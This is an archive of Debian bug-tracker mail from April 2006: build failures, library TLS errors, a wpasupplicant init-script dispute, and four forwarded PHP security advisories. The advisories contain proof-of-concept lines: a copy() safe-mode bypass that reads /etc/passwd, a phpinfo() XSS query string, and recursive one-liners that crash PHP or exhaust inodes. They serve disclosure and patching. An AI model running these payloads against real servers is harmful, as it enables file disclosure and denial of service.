Bug#361675: marked as done ([i386] kernel requirement needs to be updated to 2.4.)
Your message dated Tue, 11 Apr 2006 07:56:15 +0200 with message-id [EMAIL PROTECTED] and subject line Bug#361675: [i386] kernel requirement needs to be updated to 2.4. has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) ---BeginMessage--- Package: apt Version: 0.6.43.3 Severity: normal After a dist-upgrade this morning, apt-get starts to emit the following traceback right after it finishes downloading packages: ... Fetched 2205kB in 4s (468kB/s) Traceback (most recent call last): File /usr/bin/apt-listchanges, line 30, in ? import apt_pkg ImportError: libstdc++.so.6: cannot handle TLS data ... I'm unsure whether this is a dependency problem for apt (maybe it should link to an older libstdc++6?), or a libstdc++ regression (built with less features than the gcc4.0 version?). But since (so far) I only see this problem with apt, I'm filing it here. -- Package-specific info: -- apt-config dump -- APT ; APT::Architecture i386; APT::Build-Essential ; APT::Build-Essential:: build-essential; Dir /; Dir::State var/lib/apt/; Dir::State::lists lists/; Dir::State::cdroms cdroms.list; Dir::State::userstatus status.user; Dir::State::status /var/lib/dpkg/status; Dir::Cache var/cache/apt/; Dir::Cache::archives archives/; Dir::Cache::srcpkgcache srcpkgcache.bin; Dir::Cache::pkgcache pkgcache.bin; Dir::Etc etc/apt/; Dir::Etc::sourcelist sources.list; Dir::Etc::sourceparts sources.list.d; Dir::Etc::vendorlist vendors.list; Dir::Etc::vendorparts vendors.list.d; Dir::Etc::main apt.conf; Dir::Etc::parts apt.conf.d; Dir::Etc::preferences preferences; Dir::Bin ; Dir::Bin::methods /usr/lib/apt/methods; Dir::Bin::dpkg /usr/bin/dpkg; DPkg ; DPkg::Pre-Install-Pkgs ; DPkg::Pre-Install-Pkgs:: /usr/bin/apt-listchanges --apt || test $? -ne 10; DPkg::Pre-Install-Pkgs:: /usr/sbin/dpkg-preconfigure --apt || true; DPkg::Tools ; DPkg::Tools::Options ; DPkg::Tools::Options::/usr/bin/apt-listchanges ; DPkg::Tools::Options::/usr/bin/apt-listchanges::Version 2; -- (no /etc/apt/preferences present) -- -- /etc/apt/sources.list -- deb http://ftp.debian.skynet.be/ftp/debian/ testing main contrib non-free deb-src http://ftp.debian.skynet.be/ftp/debian/ testing main contrib non-free deb http://security.debian.org/ testing/updates main contrib non-free deb http://ftp.debian-unofficial.org/debian/ stable main contrib non-free -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.4.27-2-686-smp Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages apt depends on: ii libc6 2.3.6-3GNU C Library: Shared libraries an ii libgcc1 1:4.1.0-1 GCC support library ii libstdc++64.1.0-1The GNU Standard C++ Library v3 Versions of packages apt recommends: ii debian-archive-keyring2006.01.18 GnuPG archive keys of the Debian a -- no debconf information ---End Message--- ---BeginMessage--- Hi, I haven't seen this bug has been cloned and reassign to the glibc. glibc 2.3.6-6 is now in incoming and has, among others, the following changes: - kernel requirement updated to 2.4.0 - patch (from Petr Salinger) to support TLS with 2.4 kernels on i386 I am therefore closing this bug. Bye, Aurelien -- .''`. Aurelien Jarno | GPG: 1024D/F1BCDB73 : :' : Debian developer | Electrical Engineer `. `' [EMAIL PROTECTED] | [EMAIL PROTECTED] `-people.debian.org/~aurel32 | www.aurel32.net ---End Message---
Processed: Security
Processing commands for [EMAIL PROTECTED]: tags 361853 + security Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 There were no tags set. Tags added: security tags 361854 + security Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2 There were no tags set. Tags added: security tags 361855 + security Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 There were no tags set. Tags added: security tags 361856 + security Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 There were no tags set. Tags added: security End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: reopening
Processing commands for [EMAIL PROTECTED]: reopen 360387 Bug#360387: wpasupplicant: please support the old daemon mode as an configuration option Bug reopened, originator not changed. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#360387: reopening
reopen 360387 thanks Package: wpasupplicant Version: 0.4.8-2 Followup-For: Bug #360387 Hi! I hereby reopen this bug, since I do not see that this problem is already solved. I'm quoting to Norberts report here, because this was I nice summary: From: Norbert Preining [EMAIL PROTECTED] Subject: wpasupplicant: grave policy violation Date: Mon, 3 Apr 2006 12:21:03 +0200 I change the severity level of this bug to grave. I consider it a grave violation to break the usage of this program. Mentioning something in {NEWS,README}.Debian is not enough. It makes this package unusable for many users. This is exactly the point, upgrading to 0.4.8 silently keeps wpasupplicant from working as before. It is all about the roaming usage of laptops, and I have to concur with the OP that this is the normal usage of a laptop. I myself have 5 different wlan ap configured in my conf file, together with a fall back dhcp without any encryption. similar setup here. To sum it up: If you make such a drastic change to the package, you should provide: First, I would expect to see a (debconf) notice on upgrade, that the configuration has changed. - a clear guide on HOW to upgrade from the old roaming usage to the new system, and ensuring that it is actually working - ensure that if you upgrade from one of the respective setups, that you don't break usage and do not delete any old config-files! - or at least ask while installation which mode should be used. - in the worst case you should leave the /etc/init.d file around and change the mode of working only via /etc/default. So the admin would also need to have to edit /e/d/wpasupplicant exactly this way . I see that your new configuration method is easier to setup, especially its very useful for configuration by (thirdparty) frondends (gui). But the already mentioned trio ifplugd, wpasupplicant, guessnet is very powerful. Please support the 'old' configuration method. And not only by providing the init-script in /usr/share/doc/wpa../examples, but as a working one in /e/init.d/ and maybe disabled in /e/defaults/wpasupplicant. By the way, can you explain why the 'old' way is deprecated as you state in Readme.Debian? I haven't found any notice on upstream about this. Furthermore there are some tutorials in the web which use the 'old' way. -- Jörg Friedrich There are only 10 types of people: Those who understand binary and those who don't.
Bug#361904: Failed to load application: libstdc++.so.6: cannot handle TLS data
Package: apt-proxy Version: 1.9.33-0.1 Severity: grave Justification: renders package unusable *** Please type your report below this line *** # /etc/init.d/apt-proxy start Starting apt-proxy Failed to load application: libstdc++.so.6: cannot handle TLS data -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.4.27-2-686 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages apt-proxy depends on: ii adduser 3.85 Add and remove users and groups ii bzip2 1.0.3-2high-quality block-sorting file co ii debconf [debconf-2.0] 1.4.72 Debian configuration management sy ii logrotate 3.7.1-2Log rotation utility ii python2.3.5-5An interactive high-level object-o ii python-apt0.6.16.1 Python interface to libapt-pkg ii python-twisted2.2.0-1Event-based framework for internet ii python-twisted-web0.5.0-4An HTTP protocol implementation to ii python2.3 2.3.5-9.1 An interactive high-level object-o apt-proxy recommends no packages. -- debconf information: apt-proxy/upgrading-v2: apt-proxy/upgrading-v2-result: ___ Yahoo! Messenger with Voice: chiama da PC a telefono a tariffe esclusive http://it.messenger.yahoo.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361903: policycoreutils - FTBFS: error: 'SEMANAGE_CAN_READ' undeclared
Package: policycoreutils Version: 1.30-1 Severity: serious There was an error while trying to autobuild your package: Automatic build of policycoreutils_1.30-1 on debian01 by sbuild/s390 85 [...] make[2]: Entering directory `/build/buildd/policycoreutils-1.30/semodule' cc -O2 -g -I/usr/include -c -o semodule.o semodule.c semodule.c: In function 'main': semodule.c:248: error: 'SEMANAGE_CAN_READ' undeclared (first use in this function) semodule.c:248: error: (Each undeclared identifier is reported only once semodule.c:248: error: for each function it appears in.) make[2]: *** [semodule.o] Error 1 make[2]: Leaving directory `/build/buildd/policycoreutils-1.30/semodule' make[1]: *** [all] Error 1 make[1]: Leaving directory `/build/buildd/policycoreutils-1.30' make: *** [build/policycoreutils] Error 2 ** Build finished at 20060410-2324 FAILED [dpkg-buildpackage died] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361800: Does not compile now
Hi! Even with the patch I submitted, the resulting kernel does not compile: CC [M] net/ipsec/ipsec_tunnel.o net/ipsec/ipsec_tunnel.c: In function 'ipsec_tunnel_SAlookup': net/ipsec/ipsec_tunnel.c:279: error: dereferencing pointer to incomplete type net/ipsec/ipsec_tunnel.c:279: error: dereferencing pointer to incomplete type net/ipsec/ipsec_tunnel.c:279: error: dereferencing pointer to incomplete type net/ipsec/ipsec_tunnel.c:280: error: dereferencing pointer to incomplete type net/ipsec/ipsec_tunnel.c:280: error: dereferencing pointer to incomplete type net/ipsec/ipsec_tunnel.c:280: error: dereferencing pointer to incomplete type make[3]: *** [net/ipsec/ipsec_tunnel.o] Error 1 It's missing the definition of struct tcp_tw_bucket. This struct was removed after 2.6.12. struct tcp_tw_bucket *tw; tw = (struct tcp_tw_bucket *)ixs-skb-sk; This code knows that the struct sock pointed to by ixs-skb-sk is in fact a struct tcp_tw_bucket. But what is it in 2.6.15? I don't know the kernel, and I can't find out what to use in 2.6.15. I've commented out that section to see if more problems exist in the code. Lupe Christoph -- | You know we're sitting on four million pounds of fuel, one nuclear | | weapon and a thing that has 270,000 moving parts built by the lowest | | bidder. Makes you feel good, doesn't it? | | Rockhound in Armageddon, 1998, about the Space Shuttle | -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#334697: apt-listbugs does not query b.d.o
It seems apt-listbugs does not query bugs.debian.org but some other server. It gets its list of bugs from http://osdn.debian.or.jp/~taru/apt-listbugs/index.db-grave.gz [similary for -criticial and other severities]. Individual bug information is acquired from http://osdn.debian.or.jp/~taru/apt-listbugs/db-h/42/332442.status and similar URLs. The index file apparently has not been updated since October 2005. It's probably not a very good idea to make packages like this depend on non-debian infrastructure. Peter -- PGP signed and encrypted | .''`. ** Debian GNU/Linux ** messages preferred.| : :' : The universal | `. `' Operating System http://www.palfrader.org/ | `-http://www.debian.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361856: [php-maint] Bug#361856: copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 2.4.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1608 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now. - --- 1. Safe Mode Bypass --- General problem exists in safe mode function, because safe mode accept path like compress.zlib://. PHP442 File main/safe_mode.c - -78-80--- wrapper = php_stream_locate_url_wrapper(filename, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC); if (wrapper != NULL) return 1; - -78-80--- if php_stream_locate_url_wrapper() return something.. safe mode is going to stop. Let`s see the function php_stream_locate_url_wrapper(). PHP442 File main/streams.c - -2522-2588--- PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, char **path_for_open, int options TSRMLS_DC) { HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : url_stream_wrappers_hash); php_stream_wrapper *wrapper = NULL; const char *p, *protocol = NULL; int n = 0; if (path_for_open) *path_for_open = (char*)path; if (options IGNORE_URL) return (options STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : php_plain_files_wrapper; for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) { n++; } if ((*p == ':') (n 1) !strncmp(://, p, 3)) { protocol = path; } else if (strncasecmp(path, zlib:, 5) == 0) { /* BC with older php scripts and zlib wrapper */ protocol = compress.zlib; n = 13; if (options REPORT_ERRORS) { php_error_docref(NULL TSRMLS_CC, E_WARNING, Use of \zlib:\ wrapper is deprecated; please use \compress.zlib://\ instead.); } } if (protocol) { if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, (void**)wrapper)) { char wrapper_name[32]; if (options REPORT_ERRORS) { if (n = sizeof(wrapper_name)) n = sizeof(wrapper_name) - 1; PHP_STRLCPY(wrapper_name, protocol, sizeof(wrapper_name), n); php_error_docref(NULL TSRMLS_CC, E_NOTICE, Unable to find the wrapper \%s\ - did you forget to enable it when you configured PHP?, wrapper_name); } wrapper = NULL; protocol = NULL; } } /* TODO: curl based streams probably support file:// properly */ if (!protocol || !strncasecmp(protocol, file, n)) { if (protocol path[n+1] == '/' path[n+2] == '/') { if (options REPORT_ERRORS) php_error_docref(NULL TSRMLS_CC, E_WARNING, remote host file access not supported, %s, path); return NULL; } if (protocol path_for_open) *path_for_open = (char*)path + n + 1; /* fall back on regular file access */ return (options STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : php_plain_files_wrapper; } if (wrapper wrapper-is_url !PG(allow_url_fopen)) { if (options REPORT_ERRORS) php_error_docref(NULL TSRMLS_CC, E_WARNING, URL file-access is disabled in the server configuration); return NULL; } return wrapper; } - -2522-2588--- So if you use in your path (for example compress.zlib://), function php_stream_locate_url_wrapper() return something variable and safe mode return 1. Let's see now the source of function copy(). PHP442: ext/standard/file.c - -2114-2138--- PHP_FUNCTION(copy) { zval **source, **target; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, source, target) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(source); convert_to_string_ex(target); if (PG(safe_mode) (!php_checkuid(Z_STRVAL_PP(source), NULL, CHECKUID_CHECK_FILE_AND_DIR))) { RETURN_FALSE; } if (php_check_open_basedir(Z_STRVAL_PP(source) TSRMLS_CC)) { RETURN_FALSE; } if (php_copy_file(Z_STRVAL_PP(source), Z_STRVAL_PP(target) TSRMLS_CC)==SUCCESS) { RETURN_TRUE; } else { RETURN_FALSE; } } - -2114-2138--- http://pl2.php.net/manual/en/function.copy.php Description bool copy ( string source, string dest ) example: copy(compress.zlib:///etc/passwd, /home/cxib/to/bandyta/passwd.txt); safe mode return 1 and skip security. if (PG(safe_mode) (!php_checkuid(Z_STRVAL_PP(source), NULL, CHECKUID_CHECK_FILE_AND_DIR))) { RETURN_FALSE; } return true. Rest functions have checking safe_mode without path and safe mode works. I don't have tested all functions in php ;]. - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Exploit --- http://securityreason.com/achievement_exploitalert/8 - --- 4. Greets --- For: sp3x
Bug#361853: [php-maint] Bug#361853: phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.2.2006 - -Public: 8.4.2006 from SecurityReason.Com CVE-2006-0996 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. Cross Site Scripting --- In phpinfo() you can see all Varibles like: file: standard/info.c - -630-636--- php_print_gpcse_array(_REQUEST, sizeof(_REQUEST)-1 TSRMLS_CC); php_print_gpcse_array(_GET, sizeof(_GET)-1 TSRMLS_CC); php_print_gpcse_array(_POST, sizeof(_POST)-1 TSRMLS_CC); php_print_gpcse_array(_FILES, sizeof(_FILES)-1 TSRMLS_CC); php_print_gpcse_array(_COOKIE, sizeof(_COOKIE)-1 TSRMLS_CC); php_print_gpcse_array(_SERVER, sizeof(_SERVER)-1 TSRMLS_CC); php_print_gpcse_array(_ENV, sizeof(_ENV)-1 TSRMLS_CC); - -630-636--- Function php_print_gpcse_array() for any arrays check 4096b of varible. file: standard/info.c - -135-154--- if (Z_TYPE_PP(tmp) == IS_ARRAY) { zval *tmp3; MAKE_STD_ZVAL(tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(pre); } php_start_ob_buffer(NULL, 4096, 1 TSRMLS_CC); zend_print_zval_r(*tmp, 0); php_ob_get_buffer(tmp3 TSRMLS_CC); php_end_ob_buffer(0, 0 TSRMLS_CC); elem_esc = php_info_html_esc(Z_STRVAL_P(tmp3) TSRMLS_CC); PUTS(elem_esc); efree(elem_esc); zval_ptr_dtor(tmp3); if (!sapi_module.phpinfo_as_text) { PUTS(/pre); } } else if (Z_TYPE_PP(tmp) != IS_STRING) { - -135-154--- So if we create array longer like 4096, html tags don't be remove. Exploit: If in php script is function phpinfo() try create some varibles (array) like phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS ] or phpinfo.php?cx[]=c..~4096chars...ccc[XSS] - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAIl3Ke13X/fTO4RAo4LAJ0fBxJWN64vWrDYJEuhGkqc/OC42QCbBxip f35+6LHjuBoqP5D2JV84ufs= =iz3m -END PGP SIGNATURE- -- Ondrej Sury [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Bug#361854: [php-maint] Bug#361854: function *() php/apache Crash PHP 4.4.2 and 5.1.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [function *() php/apache Crash PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 21.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1549 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. - --- 1. function *() Crash --- PHP4/5 is vulnerability to a local denial-of-service. General problem is in allocated data to memory. for example attack: cxib# php -r 'function cx(){ cx(); } cx();' Segmentation fault (core dumped) cxib# Segfault.. let`s see what we have in gdb - --- cxib# cat /www/functionsegfault.php ? function cx(){ cx(); } cx(); ? cxib# gdb -q php (gdb) r '/www/functionsegfault.php' Starting program: /usr/local/bin/php '/www/functionsegfault.php' Program received signal SIGSEGV, Segmentation fault. 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c, __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 111 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c: No such file or directory. in /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c (gdb) bt #0 0x080de6bd in _zval_copy_ctor (zvalue=0xbbc00260, __zend_filename=0x811d8c0 /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c, __zend_lineno=1568) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_variables.c:111 #1 0x080f042a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1568 #2 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #3 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #4 0x080f019a in execute (op_array=0x81b3880) at /usr/ports/lang/php4/work/php-4.4.2/Zend/zend_execute.c:1719 #5 0x080f019a in execute (op_array=0x81b3880) ... - --- or in apache error_log [Mon Mar 20 12:12:54 2006] [notice] child pid 744 exit signal Illegal instruction (4) - --- 2. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 3. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAT43Ke13X/fTO4RAiFnAKC+vzJm1w24b4VN9CMdhE6e6a2L4QCePbp7 lNzhZke21IHXM0TvvjntXyY= =Y7Ft -END PGP SIGNATURE- -- Ondrej Sury [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Bug#361912: xutils-dev - FTBFS: No package 'xproto' found
Package: xutils-dev Version: 1:1.0.1-3 Severity: serious There was an error while trying to autobuild your package: Automatic build of xutils-dev_1:1.0.1-3 on debian-31 by sbuild/s390 85 [...] checking pkg-config is at least version 0.9.0... yes checking for XPROTO... configure: error: Package requirements (xproto) were not met: No package 'xproto' found Consider adjusting the PKG_CONFIG_PATH environment variable if you installed software in a non-standard prefix. Alternatively, you may set the environment variables XPROTO_CFLAGS and XPROTO_LIBS to avoid the need to call pkg-config. See the pkg-config man page for more details. make: *** [build-stamp] Error 1 ** Build finished at 20060410-2300 FAILED [dpkg-buildpackage died] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: apt-listbugs does not show several grave/serious bugs
Processing commands for [EMAIL PROTECTED]: tags 334697 + fixed Bug#334697: apt-listbugs does not show several grave/serious bugs There were no tags set. Tags added: fixed thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#334697: apt-listbugs does not show several grave/serious bugs
tags 334697 + fixed thanks I noticed maintainer's cron script at osdn.d.o.j had stopped since a long time ago by wrong permission. I fixed it and hope this bug is solved. Thanks, -- Kenshi Muto [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361909: xserver-xorg-input-digitaledge - FTBFS: Wrong architecture line
Package: xserver-xorg-input-digitaledge Version: 1:1.0.1.3-2 Severity: serious There was an error while trying to autobuild your package: Automatic build of xserver-xorg-input-digitaledge_1:1.0.1.3-2 on debian-31 by sbuild/s390 85 [...] Building Dependency Tree... E: Couldn't find package xserver-xorg-dev apt-get failed. Package installation failed Trying to reinstall removed packages: Trying to uninstall newly installed packages: Source-dependencies not satisfied; skipping xserver-xorg-input-digitaledge ** Finished at 20060410-2257 Build needed 00:00:00, 0k disk space -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361855: [php-maint] Bug#361855: tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 26.3.2006 - -Public: 8.4.2006 from SECURITYREASON.COM CVE-2006-1494 - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig S#230;ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available. tempnam -- Create file with unique file name - --- 1. tempnam() open_basedir bypass --- In function tempname() are required 2 arg`s. http://pl.php.net/manual/en/function.tempnam.php string tempnam ( string dir, string prefix ) So, if we have open_basedir set to /home, we can't create file over /home directory. In ext/standard/file.c (PHP 4.4.2) - -550-578--- PHP_FUNCTION(tempnam) { pval **arg1, **arg2; char *d; char *opened_path; char p[64]; FILE *fp; if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, arg1, arg2) == FAILURE) { WRONG_PARAM_COUNT; } convert_to_string_ex(arg1); convert_to_string_ex(arg2); if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1)); strlcpy(p, Z_STRVAL_PP(arg2), sizeof(p)); if ((fp = php_open_temporary_file(d, p, opened_path TSRMLS_CC))) { fclose(fp); RETVAL_STRING(opened_path, 0); } else { RETVAL_FALSE; } efree(d); } - -550-578--- if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) { RETURN_FALSE; } Where is arg2? So we can write exploit like: tempnam(path_from_open_basedir, ../../../../../../../../Open_basedir_bypasswd); tempnam(/home, ../../../../../../tmp/cx); etc. It is low issue but you can try create a lot of files and overload inodes from HD.I have one particion. /var /dev/ad0s1e 1.0G 97M 858M 10% /var - Space (B) /dev/ad0s1e 1012974 94472 837466 10% 3796 137514 3% /var - INODES where mysql and apache try create some file. WWhen we overload free inodes, system have big problem with apache, mysql. Example: cxib# php -r 'function cx(){ tempnam(/www/, ../../../../../../var/tmp/cx); cx(); } cx();' /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free /var: create/symlink failed, no inodes free ... etc /usr/local/libexec/mysqld: Can't create/write to file '/var/tmp/ibBIsZ6o' (Errcode: 13) And mysql die()! - --- 2. How to fix --- CVS http://cvs.php.net/viewcvs.cgi/php-src/NEWS - --- 3. Greets --- For: sp3x and p_e_a, pi3, eax, Infospec ;] - --- 4. Contact --- Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ] Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg SecurityReason.Com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (FreeBSD) iD8DBQFEOAZB3Ke13X/fTO4RAiDmAKCbBZP8JBC0F/9cB5OgUFJPgqHB4QCgon9L kBEMIExP2TZ0+NP7l5uk9TE= =f3i4 -END PGP SIGNATURE- -- Ondrej Sury [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Bug#361908: xorg - FTBFS: debian/scripts/vars.s390: No such file or directory
Package: xorg Version: 1:7.0.10 Severity: serious There was an error while trying to autobuild your package: Automatic build of xorg_1:7.0.10 on debian-31 by sbuild/s390 85 [...] /usr/bin/fakeroot debian/rules clean debian/rules:39: debian/scripts/vars.s390: No such file or directory make: *** No rule to make target `debian/scripts/vars.s390'. Stop. ** Build finished at 20060410-2236 FAILED [dpkg-buildpackage died] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#361910: FTBFS (alpha): Undefined system call: sigprocmask
Package: klibc Severity: serious Justification: no longer builds from source klibc fails to build on alpha: [...] SYSCALL FOUND: getrlimit SYSCALL FOUND: tkill klibc/syscalls/SYSCALLS.i:187: Undefined system call: sigprocmask ld -r -o klibc/syscalls/syscalls.o ld: no input files make[4]: *** [klibc/syscalls/syscalls.o] Error 1 make[3]: *** [klibc/syscalls] Error 2 make[2]: *** [all] Error 2 make[1]: *** [klibc] Error 2 make[1]: Leaving directory `/tmp/buildd/klibc-1.3.3' Full log at http://buildd.debian.org/fetch.php?pkg=klibcver=1.3.3-1arch=alphastamp=1144343491file=logas=raw Falk -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: alpha Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.16-g3cbb90a9-dirty Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#360387: [pkg-wpa-devel] Bug#360387: init script gone
What would people say to providing an init daemon for wpasupplicant in a separate binary package, for example, wparoamd or so? Thanks, Kel. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: your mail
